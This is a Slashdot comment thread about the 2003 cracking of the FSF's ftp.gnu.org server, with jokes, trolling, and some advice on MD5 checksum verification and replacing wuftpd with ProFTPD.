what the hell does this have to do with apache? IIS has a an ftp module...ofcourse..and it IS laughable...

so what gives? whad I miss?
is the parent just an i D 10 T?

Re:So apache no invulnerable then... (0)

Anonymous Coward | more than 11 years ago | (#6687163)

is the parent just an i D 10 T?
Bingo!

apache? (2, Insightful)

DreadSpoon (653424) | more than 11 years ago | (#6687147)

What does apache, an http server, have to do with their ftp server being cracked?

But no, Apache isn't 100% secure. There is no such 100% server, except one unplugged from the net, encased in titanium, and buried beneath the Pacific seabed.

Silly GNU (1)

beefdart (520839) | more than 11 years ago | (#6686977)

The site ftp.gnu.org is running Apache/1.3.26 (Unix) Debian GNU/Linux mod_python/2.7.8 Python/2.1.3 on Linux

tsk, tsk..

Re:Silly GNU (0)

Anonymous Coward | more than 11 years ago | (#6687134)

[Using same reasoning as many IIS complaints post here over the last several years]

See - you can't trust open source software! The stuff is buggy as #ell and is very insecure. Even important sites for the open source community can not protect themselves...

Seriously though, Isn't it funny that everyone is being so quiet about what OS and FTP server they were using. What's wrong - afraid of a little criticism?

Isn't it time that we, as a community, started pointing out that even the best system is impossible to completely secure. It is easy to take cheap shots at Microsoft. However, as LINUX becomes more widely used more people will be looking for ways to exploit it.

This happened days ago (1)

jaymzter (452402) | more than 11 years ago | (#6686980)

I've been working on a LinuxFromScratch installation, and was perplexed as to why none of the packages I needed were available. The whole alpha.gnu.org thing set me back for a while too. Thankfully I found a debian mirror with (hopefully) good packages

BSD Ports trees should have them (5, Informative)

lactose99 (71132) | more than 11 years ago | (#6686986)

Taking a brief glance over my FreeBSD server, all of the entries in the Ports tree have the MD5SUMs in the "files" file. The Ports tree includes many many FSF software package installs.

Re:BSD Ports trees should have them (5, Informative)

lactose99 (71132) | more than 11 years ago | (#6687010)

Oops... its the "distinfo" file that contains the MD5SUMs, not "files".

Re:BSD Ports trees should have them (0)

Anonymous Coward | more than 11 years ago | (#6687058)

ditto for gentoo.

As the "license" says (0)

Anonymous Coward | more than 11 years ago | (#6686988)

There is no warranty, we are not responsible, etc.

See:

http://www.infoworld.com/article/03/08/06/HNgplu ne nforceable_1.html

for problems with the GPL from the German and EU point of view.

morons monitoring other phonIE #'s, PostBlock(tm) (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#6686991)

devise, cracked again, still infactdead.

there's some rumour afoot that fuddles is not the only fox in the henhouse/sheep shearing shed.

the 'value' of va lairIE/robbIE's payper pawnshop increased in 'value' by 25 million dollars yesterdaze.

must be due to the smashing sucksass of the patentdead PostBlock devise, .combined with the ip rights to the saykrud kode of the SourceForgerIE(tm).

no wonder the pumping&dumping is so exciting for the damnned. that's a lotta spendolas to acquire for doing nothing. also easy to see how bullined faith works, if you look. small wonder they pretend that there is no stock markup, unless they're attacking their rivals.

the lights are coming up now.

you can pretend all you want. our advise is to be as far away from the walking dead contingent as possible, when the big flash occurs. you wouldn't want to get any of that evile on you.

as to the free unlimited energy plan, as the lights come up, more&more folks will stop being misled into sucking up more&more of the infant killing barrolls of crudeness, & learn that it's more than ok to use newclear power generated by natural (hydro, solar, etc...)methods. of course more information about not wasting anything/behaving less frivolously is bound to show up, here&there.

cyphering how many babies it costs for a barroll of crudeness, we've decided to cut back, a lot, on wasteful things like giving monIE to felons, to help them destroy the planet/population.

no matter. the #1 task is planet/population rescue. the lights are coming up. we're in crisis mode. you can help.

the unlimited power (such as has never been seen before) is freely available to all, with the possible exception of the aforementioned walking dead.

consult with/trust in yOUR creator. more breathing. vote with yOUR wallet. seek others of non-aggressive intentions/behaviours. that's the spirit, moving you.

pay no heed/monIE to the greed/fear based walking dead.

each harmed innocent carries with it a bad toll. it will be repaid by you/us. the Godless felons will not be available to make reparations.

pay attention. that's definitely affordable, plus you might develop skills which could prevent you from being misled any further by phonIE ?pr? ?firm? generated misinformation.

good work so far. there's still much to be done. see you there. tell 'em robbIE.

the rest of the wwworld is laughing/crying at/for US in sympathy/disgust, as we fall/jump into the daze of the georgewellian corepirate nazi life0cide, whilst criticizing their ip gangsters, which are also members of the walking dead.

Where's the snide comments from the /. editors? (1, Insightful)

Anonymous Coward | more than 11 years ago | (#6686995)

Oh wait, this wasn't a Microsoft site that was cracked and failed to make full backups, it was the Free Software Foundation. Does this mean I can't look forward to michael writing a one liner in the story header showing that this proves that you can't rely on Free Software.

Oops! (3, Funny)

TypoNAM (695420) | more than 11 years ago | (#6686996)

Hate it when that happends...

Who wants to sell off some MD5 checksums off ebay? Let's make a few dallors! :D

Anyone know *when* this happened? (1)

daoine (123140) | more than 11 years ago | (#6687003)

I noticed that the emacs package for XP (had to reinstall the thing, again) was missing last week, but I really didn't think very much of it. But that would mean it was cracked a significant amount of time ago...

Surprising that there hasn't been much news of it.

This is a conspiracy (5, Funny)

palad1 (571416) | more than 11 years ago | (#6687004)

When looking at the missing files: gnu/windows/emacs/21.2/leim-21.2-src.tar.gz gnu/windows/emacs/21.2/emacs-21.2-barebin-i386.tar .gz gnu/windows/emacs/21.2/emacs-21.2-bin-i386.tar.gz gnu/windows/emacs/21.2/emacs-21.2-fullbin-i386.tar .gz gnu/windows/emacs/21.2/emacs-21.2-leim.tar.gz gnu/windows/emacs/21.2/emacs-21.2-lisp.tar.gz gnu/windows/emacs/21.2/emacs-21.2-src.tar.gz gnu/windows/emacs/21.2/emacs-21.2-undumped-i386.ta r.gz

the list goes on abd on and...
now, grep for 'vi' : nothing, nada, null.

Of course, what do you think? This is a conspiracy orchestrated by VI lovers, to wipe out EMACS from the face of earth!

Kettle. Pot. Black. (0)

Anonymous Coward | more than 11 years ago | (#6687009)

Yea, Free Software is so much more secure than Microsoft.

Go Apple!

Checksums? (1)

aggressivepedestrian (149887) | more than 11 years ago | (#6687012)

If you can provide MD5sums for any of the files listed in MISSING-FILES, it would be very much appreciated.
Uh, am I missing something? If I cracked your site, put a file on it, and then you asked the world for valid MD5 sums, wouldn't I be more than willing to give you the MD5 sum for the bogus file?

Re:Checksums? (0)

Anonymous Coward | more than 11 years ago | (#6687127)

I would hope they would wait until more than just one MD5SUM came in per package and checked them against each-other....

Late news (2, Informative)

coleSLAW (23358) | more than 11 years ago | (#6687016)

Move along folks, nothing to see here. alpha.gnu.org was cracked many months ago.

headline (5, Funny)

Lxy (80823) | more than 11 years ago | (#6687022)

if you understand the headline

FSF FTP Site Cracked, Looking for MD5 Sums

You just might be a geek.

Time to hit those logs (1)

rf0 (159958) | more than 11 years ago | (#6687025)

and see whats been installed from where..Ho hum

Rus

This pisses me off more than it should. (5, Interesting)

Deadbolt (102078) | more than 11 years ago | (#6687029)

Okay, this kind of shit makes me want to start throwing bricks. Cracking the GNU FTP server? Is nothing sacred anymore? I feel like someone burned down a church.

They've done so much for humanity and some utter twit decides to compensate for his bad childhood by taking their server down.

*goes off to dock another point from his faith in humanity*

So what if I comprimised the site... (1)

Roached (84015) | more than 11 years ago | (#6687030)

...and sent my MD5 sum?

They never heard of... (1)

Yaa 101 (664725) | more than 11 years ago | (#6687035)

Mirror sites and rsync? one would think that the FSF has professional help for these kind of things...

You're Kidding? (5, Insightful)

System Control (690846) | more than 11 years ago | (#6687036)

The Free Software Foundation's FTP site at ftp.gnu.org has been "compromised", and they don't seem to have full backups.

Unbelievable. And I'm supposed to trust their methods and products with my enterprise?

Re:You're Kidding? (4, Insightful)

Lxy (80823) | more than 11 years ago | (#6687154)

While your post is somewhat trollish, I have to agree that this is an interesting prediciment for the FSF. To save face, I hope they post a detailed account of how they were cracked, and own up to their mistakes so they can all teach us what not to do. That's the power of openness :-)

Any other ways to help? (1, Offtopic)

mschoolbus (627182) | more than 11 years ago | (#6687039)

I will donate a CDR if that helps you keep your little files...

Its hard to believe something like this actually happened, especially to the FSF... You would think... nevermind

That is awful... (3, Insightful)

Badanov (518690) | more than 11 years ago | (#6687050)

I run a coupla Linux boxes at work and a couple at home, and I swear I don't even take a dump unless I am certain I have backups.

Having just read the above, let me add: Let a thousand jokes be posted!

Trusted mirrors with the MD5 sums? (1)

gspr (602968) | more than 11 years ago | (#6687056)

Surely there must be some mirrors that are 100% trusted? Ran by GNU staff, and the such?

GNu is Unsecure (-1, Offtopic)

DrSkwid (118965) | more than 11 years ago | (#6687071)

nt

FSF FTP mirror here: (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#6687082)

ftp.sco.com

Top Five Ways For The Linux Zealot To Deal With It (-1, Troll)

Anonymous Coward | more than 11 years ago | (#6687088)

5. "Free Software Foundation did not make Linux"
4. "AaAAAAAaaaAAAAAaaAAA!"
3. Discuss technical issues regarding backups, effectively ignoring that the #1 Property Of Stallman Approved server was violated and disgraced
2. "Windows Still Sucks"
1. Tell everyone that Gates did it by selling hardware with built-in security flaws to the FSF through clandestine channels, going all the way up to You Know Who

obvious conclusion (0, Funny)

Anonymous Coward | more than 11 years ago | (#6687094)

/puts on tinfoil hat/

BUSH/ASHCROFT/CIA haxored it and put trojans in all GNU software. They are using it to track peopled down and send them to Gitmo!!!

I bet SCO knows something about this.. (0, Flamebait)

dBLiSS (513375) | more than 11 years ago | (#6687115)

Just yesterday there was a story runnign about FSF talking about pulling SCO support. I bet the slick SCO fellahs had nothing to do with this...

Obligatory Simpson's Quote (0)

Anonymous Coward | more than 11 years ago | (#6687123)

GNUDoh!

If this had been an open source ftp server (4, Funny)

Stalemate (105992) | more than 11 years ago | (#6687161)

We would already be flooded with posts about how if this were a Microsoft server we would already be flooded with posts bashing Microsoft and talking about....oh, right, my bad.

wuftpd is trouble, use ProFTPD (1)

bigberk (547360) | more than 11 years ago | (#6687172)

Why not use ProFTPD [linux.co.uk] ? It has a much better security track record that wuftpd, and is actively developed. Considering all the roots that happen from default wuftpd installs, one of the first thing I recommend to linux newbies is to scrap wuftpd. And setting up a chroot environment is as easy as one directive: "DefaultRoot ~"
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?